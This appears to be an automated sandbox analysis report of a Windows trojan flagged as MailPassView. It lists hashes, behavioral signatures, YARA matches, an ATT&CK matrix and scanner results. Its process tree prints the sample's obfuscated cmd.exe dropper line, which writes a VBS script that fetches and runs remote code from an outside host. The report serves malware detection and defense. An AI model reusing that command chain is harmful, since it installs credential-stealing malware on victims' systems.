Edit tour
Windows
Analysis Report
dGuYmJNS1K.exe
Overview
General Information
| Sample Name: | dGuYmJNS1K.exe |
| Original Sample Name: | 897af5616bfd6af5b687876924f39ee3.exe |
| Analysis ID: | 1330994 |
| MD5: | 897af5616bfd6af5b687876924f39ee3 |
| SHA1: | d560fdaed07146a1b4fa519ae023bfa61c1594a6 |
| SHA256: | 8a013b99a9b82e0f67b3e472f7627052915507916311f10cac5b69e87f3d19d4 |
| Tags: | 32exetrojan |
| Infos: |  |
 | |
Detection
MailPassView
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Yara detected MailPassView
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Writes to foreign memory regions
Command shell drops VBS files
Contains functionality to modify clipboard data
Yara detected WebBrowserPassView password recovery tool
Obfuscated command line found
Found API chain indicative of sandbox detection
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Drops files with a non-matching file extension (content does not match file extension)
OS version to string mapping found (often used in BOTs)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to execute programs as a different user
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Classification
- System is w10x64
dGuYmJNS1K.exe (PID: 6972 cmdline: C:\Users\u ser\Deskto p\dGuYmJNS 1K.exe MD5: 897AF5616BFD6AF5B687876924F39EE3) 
cmd.exe (PID: 6008 cmdline: C:\Windows \system32\ cmd.exe /c echo|set /p=^"sq048 =".":r54=" i":y8628=" g":k4js7=" :":GetO^"> %Public%\b jk6l9.vbs& echo|set / p=^"bject( "sCr"+r54+ "pt"+k4js7 +"hT"+"Tps "+k4js7+"/ /m4gx"+sq0 48+"dns04" +sq048+"co m//"+y8628 +"1")^">>% Public%\bj k6l9.vbs&c d c:\windo ws\system3 2\&cmd /c start %Pub lic%\bjk6l 9.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2020 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 2536 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 3084 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" se t /p="sq04 8=".":r54= "i":y8628= "g":k4js7= ":":GetO" 1>C:\Users \Public\bj k6l9.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 2852 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 2800 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" se t /p="bjec t("sCr"+r5 4+"pt"+k4j s7+"hT"+"T ps"+k4js7+ "//m4gx"+s q048+"dns0 4"+sq048+" com//"+y86 28+"1")" 1 >>C:\Users \Public\bj k6l9.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 6668 cmdline:
cmd /c sta rt C:\User s\Public\b jk6l9.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) 
wscript.exe (PID: 6336 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \bjk6l9.vb s" MD5: FF00E0480075B095948000BDC66E81F0) 
ef2dsio342ai.exe (PID: 7236 cmdline: "C:\wql455 oi0\ef2dsi o342ai.exe " ef2dsio3 42 MD5: 0ADB9B817F1DF7807576C2D7068DD931) 
attrib.exe (PID: 7256 cmdline: c:/windows /SysWOW64/ attrib.exe MD5: 0E938DD280E83B1596EC6AA48729C2B0)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security | ||
| JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security | ||
| JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security | ||
| JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security | ||
| JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security | ||
| Click to see the 3 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security | ||
| APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth |
| |
| JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security | ||
| APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth |
| |
| JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security | ||
| Click to see the 17 entries | ||||
⊘No Sigma rule has matched
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |   |
|---|
| Source: | ReversingLabs: | |||
| Source: | Virustotal: | Perma Link | ||
| Source: | Virustotal: | Perma Link | ||
| Source: | Static PE information: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Static PE information: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 0_2_00FE756C | |
| Source: | Code function: | 12_2_00D7E387 | |
| Source: | Code function: | 12_2_00D8A0FA | |
| Source: | Code function: | 12_2_00D8A488 | |
| Source: | Code function: | 12_2_00D865F1 | |
| Source: | Code function: | 12_2_00D872E9 | |
| Source: | Code function: | 12_2_00D87248 | |
| Source: | Code function: | 12_2_00D7D836 | |
| Source: | Code function: | 12_2_00D7DB69 | |
| Source: | Code function: | 12_2_00D89F9F | |
| Source: | Code function: | 12_2_10001B50 | |
| Source: | Code function: | 12_2_10001CB0 | |
| Source: | Code function: | 12_2_1000DD08 | |
| Source: | Code function: | 12_2_1000DDF7 | |
| Source: | Code function: | 12_2_10005E22 | |
| Source: | Code function: | 12_2_10015FFE | |
| Source: | Code function: | 12_2_10006006 | |
| Source: | Code function: | 12_2_100022B0 | |
| Source: | Code function: | 12_2_1000651B | |
| Source: | Code function: | 12_2_10006874 | |
| Source: | Code function: | 12_2_100068DC | |
| Source: | Code function: | 12_2_1000696B | |
| Source: | Code function: | 12_2_10006A35 | |
| Source: | Code function: | 12_2_10006AA1 | |
| Source: | Code function: | 12_2_1000CB3C | |
| Source: | Code function: | 12_2_1000557C | |
| Source: | Code function: | 12_2_100055BB | |
| Source: | Code function: | 12_2_10013A05 | |
| Source: | Code function: | 12_2_10005A07 | |
| Source: | Code function: | 12_2_10003A90 | |
| Source: | Code function: | 12_2_1000BD1B | |
| Source: | Code function: | 12_2_1000DDCE | |
| Source: | Code function: | 12_2_1000BDFA | |
| Source: | Code function: | 12_2_1000DE70 | |
| Source: | Code function: | 12_2_1000BF8C | |
| Source: | Code function: | 12_2_1000C052 | |
| Source: | Code function: | 12_2_1000C07B | |
| Source: | Code function: | 12_2_100068D4 | |
| Source: | Code function: | 12_2_100088F0 | |
| Source: | Code function: | 12_2_100069E2 | |
| Source: | Code function: | 12_2_10006B10 | |
| Source: | Code function: | 12_2_1000CDC0 | |
| Source: | Code function: | 13_2_0040C5B8 | |
| Source: | JA3 fingerprint: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | DNS traffic detected: | ||
| Source: | Code function: | 12_2_00D8D7A1 | |
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | HTTPS traffic detected: | ||
Key, Mouse, Clipboard, Microphone and Screen Capturing | |
|---|
| Source: | Code function: | 12_2_00D8F6C7 | |
| Source: | Code function: | 12_2_00D7A54A | |
| Source: | Code function: | 12_2_00D8F45C | |
| Source: | Code function: | 12_2_00D8F45C | |
| Source: | Code function: | 12_2_00DA9ED5 | |
System Summary | |
|---|
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Code function: | 0_2_00FEE9A1 | |
| Source: | Code function: | 12_2_00D2E0BE | |
| Source: | Code function: | 12_2_00D32007 | |
| Source: | Code function: | 12_2_00D38037 | |
| Source: | Code function: | 12_2_00D1E1A0 | |
| Source: | Code function: | 12_2_00D322C2 | |
| Source: | Code function: | 12_2_00D4A28E | |
| Source: | Code function: | 12_2_00D1225D | |
| Source: | Code function: | 12_2_00D2C59E | |
| Source: | Code function: | 12_2_00D9C7A3 | |
| Source: | Code function: | 12_2_00D4E89F | |
| Source: | Code function: | 12_2_00D8291A | |
| Source: | Code function: | 12_2_00D46AFB | |
| Source: | Code function: | 12_2_00D78B27 | |
| Source: | Code function: | 12_2_00D3CE30 | |
| Source: | Code function: | 12_2_00DA51D2 | |
| Source: | Code function: | 12_2_00D47169 | |
| Source: | Code function: | 12_2_00D19240 | |
| Source: | Code function: | 12_2_00D19499 | |
| Source: | Code function: | 12_2_00D31724 | |
| Source: | Code function: | 12_2_00D31A96 | |
| Source: | Code function: | 12_2_00D37BAB | |
| Source: | Code function: | 12_2_00D19B60 | |
| Source: | Code function: | 12_2_00D37DDA | |
| Source: | Code function: | 12_2_00D31D40 | |
| Source: | Code function: | 12_2_100091AC | |
| Source: | Code function: | 12_2_100095C4 | |
| Source: | Code function: | 12_2_100177FB | |
| Source: | Code function: | 12_2_100099F9 | |
| Source: | Code function: | 12_2_10019AB5 | |
| Source: | Code function: | 12_2_10011D65 | |
| Source: | Code function: | 12_2_10017D6B | |
| Source: | Code function: | 12_2_10009E2E | |
| Source: | Code function: | 12_2_1000C07B | |
| Source: | Code function: | 12_2_100182DB | |
| Source: | Code function: | 12_2_10018A57 | |
| Source: | Code function: | 12_2_10008B60 | |
| Source: | Code function: | 12_2_10008CB8 | |
| Source: | Code function: | 12_2_00D71A91 | |
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Dropped File: | ||
| Source: | Static PE information: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Code function: | 12_2_00D7F122 | |
| Source: | Code function: | 12_2_00D84678 | |
| Source: | Static PE information: | ||
| Source: | File created: | Jump to behavior | ||
| Source: | Classification label: | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Code function: | 12_2_00D8410F | |
| Source: | Code function: | 12_2_00D83923 | |
| Source: | Process created: | ||
| Source: | ReversingLabs: | ||
| Source: | Virustotal: | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Key value queried: | Jump to behavior | ||
| Source: | Code function: | 12_2_00D7194F | |
| Source: | Code function: | 12_2_00D71F53 | |
| Source: | Code function: | 12_2_00D94089 | |
| Source: | Code function: | 12_2_00D85B27 | |
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Code function: | 12_2_00D9AFDB | |
| Source: | Mutant created: | ||
| Source: | Command line argument: | 0_2_00FE1000 | |
| Source: | Command line argument: | 0_2_00FE1000 | |
| Source: | Command line argument: | 0_2_00FE1000 | |
| Source: | Command line argument: | 0_2_00FE1000 | |
| Source: | Command line argument: | 0_2_00FE1000 | |
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | Window detected: | ||
| Source: | Static file information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
Data Obfuscation | |
|---|
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Code function: | 0_2_00FEF0E7 | |
| Source: | Code function: | 12_2_00D60333 | |
| Source: | Code function: | 12_2_00D30E19 | |
| Source: | Code function: | 12_2_00D2DC01 | |
| Source: | Code function: | 12_2_10007579 | |
| Source: | Code function: | 12_2_1000ADF8 | |
| Source: | Code function: | 13_2_007460ED | |
| Source: | Code function: | 13_2_0041B176 | |
| Source: | Code function: | 13_2_0041AE46 | |
| Source: | Code function: | 13_2_004CEE85 | |
| Source: | Code function: | 12_2_00D15D78 | |
Persistence and Installation Behavior | |
|---|
| Source: | File created: | Jump to behavior | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | Code function: | 12_2_00DA25A0 | |
| Source: | Code function: | 12_2_00D2FC8A | |
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
Malware Analysis System Evasion | |
|---|
| Source: | Sandbox detection routine: | graph_12-112519 | ||
| Source: | Last function: | ||
| Source: | API coverage: | ||
| Source: | WMI Queries: | ||
| Source: | WMI Queries: | ||
| Source: | Window found: | Jump to behavior | ||
| Source: | WMI Queries: | ||
| Source: | API call chain: | graph_12-113645 | ||
| Source: | API call chain: | graph_12-113261 | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Code function: | 12_2_00D15D78 | |
| Source: | Code function: | 0_2_00FE756C | |
| Source: | Code function: | 12_2_00D7E387 | |
| Source: | Code function: | 12_2_00D8A0FA | |
| Source: | Code function: | 12_2_00D8A488 | |
| Source: | Code function: | 12_2_00D865F1 | |
| Source: | Code function: | 12_2_00D872E9 | |
| Source: | Code function: | 12_2_00D87248 | |
| Source: | Code function: | 12_2_00D7D836 | |
| Source: | Code function: | 12_2_00D7DB69 | |
| Source: | Code function: | 12_2_00D89F9F | |
| Source: | Code function: | 12_2_10001B50 | |
| Source: | Code function: | 12_2_10001CB0 | |
| Source: | Code function: | 12_2_1000DD08 | |
| Source: | Code function: | 12_2_1000DDF7 | |
| Source: | Code function: | 12_2_10005E22 | |
| Source: | Code function: | 12_2_10015FFE | |
| Source: | Code function: | 12_2_10006006 | |
| Source: | Code function: | 12_2_100022B0 | |
| Source: | Code function: | 12_2_1000651B | |
| Source: | Code function: | 12_2_10006874 | |
| Source: | Code function: | 12_2_100068DC | |
| Source: | Code function: | 12_2_1000696B | |
| Source: | Code function: | 12_2_10006A35 | |
| Source: | Code function: | 12_2_10006AA1 | |
| Source: | Code function: | 12_2_1000CB3C | |
| Source: | Code function: | 12_2_1000557C | |
| Source: | Code function: | 12_2_100055BB | |
| Source: | Code function: | 12_2_10013A05 | |
| Source: | Code function: | 12_2_10005A07 | |
| Source: | Code function: | 12_2_10003A90 | |
| Source: | Code function: | 12_2_1000BD1B | |
| Source: | Code function: | 12_2_1000DDCE | |
| Source: | Code function: | 12_2_1000BDFA | |
| Source: | Code function: | 12_2_1000DE70 | |
| Source: | Code function: | 12_2_1000BF8C | |
| Source: | Code function: | 12_2_1000C052 | |
| Source: | Code function: | 12_2_1000C07B | |
| Source: | Code function: | 12_2_100068D4 | |
| Source: | Code function: | 12_2_100088F0 | |
| Source: | Code function: | 12_2_100069E2 | |
| Source: | Code function: | 12_2_10006B10 | |
| Source: | Code function: | 12_2_1000CDC0 | |
| Source: | Code function: | 13_2_0040C5B8 | |
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | Code function: | 12_2_00D15D78 | |
| Source: | Code function: | 12_2_00D35078 | |
| Source: | Code function: | 0_2_00FE1A8E | |
| Source: | Code function: | 12_2_100135E8 | |
| Source: | Code function: | 0_2_00FE98ED | |
| Source: | Code function: | 13_2_004093C8 | |
| Source: | Code function: | 12_2_00D8F3FF | |
| Source: | Code function: | 0_2_00FE1C21 | |
| Source: | Code function: | 0_2_00FE1A8E | |
| Source: | Code function: | 0_2_00FE5A5B | |
| Source: | Code function: | 0_2_00FE1602 | |
| Source: | Code function: | 12_2_00D429B2 | |
| Source: | Code function: | 12_2_00D30BCF | |
| Source: | Code function: | 12_2_00D30D65 | |
| Source: | Code function: | 12_2_00D30FB1 | |
| Source: | Code function: | 12_2_1000E6D9 | |
HIPS / PFW / Operating System Protection Evasion | |
|---|
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Code function: | 12_2_10001950 | |
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Code function: | 12_2_00D7BB02 | |
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Code function: | 12_2_00D71A91 | |
| Source: | Code function: | 12_2_00D13312 | |
| Source: | Code function: | 12_2_00D7EBE5 | |
| Source: | Code function: | 12_2_00D71EF3 | |
| Source: | Code function: | 12_2_00D713F2 | |
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Code function: | 12_2_10011683 | |
| Source: | Code function: | 12_2_10011699 | |
| Source: | Code function: | 12_2_100143E3 | |
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Code function: | 0_2_00FE1D35 | |
| Source: | Key value queried: | Jump to behavior | ||
| Source: | Code function: | 0_2_00FE1975 | |
| Source: | Code function: | 12_2_00D4BF0F | |
| Source: | Code function: | 12_2_00D6E5F8 | |
| Source: | Code function: | 12_2_00D15D78 | |
Stealing of Sensitive Information | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Code function: | 12_2_00D92163 | |
| Source: | Code function: | 12_2_00D91B61 | |
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2 Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot |
| Default Accounts | 111 Scripting | 2 Valid Accounts | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 21 Input Capture | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | 1 Native API | Logon Script (Windows) | 2 Valid Accounts | 111 Scripting | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 12 Clipboard Data | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | 113 Command and Scripting Interpreter | Logon Script (Mac) | 21 Access Token Manipulation | 2 Obfuscated Files or Information | NTDS | 57 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 13 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
| Cloud Accounts | Cron | Network Logon Script | 412 Process Injection | 1 DLL Side-Loading | LSA Secrets | 241 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | 11 Masquerading | Cached Domain Credentials | 11 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | 2 Valid Accounts | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 11 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
| Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 412 Process Injection | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact |
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
InternetThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 21% | ReversingLabs | Win32.Trojan.Generic | ||
| 31% | Virustotal | Browse |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 9% | ReversingLabs | |||
| 10% | Virustotal | Browse |
⊘No Antivirus matches
⊘No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 1% | Virustotal | Browse | ||
| 1% | Virustotal | Browse | ||
| 0% | Virustotal | Browse | ||
| 0% | Virustotal | Browse | ||
| 1% | Virustotal | Browse | ||
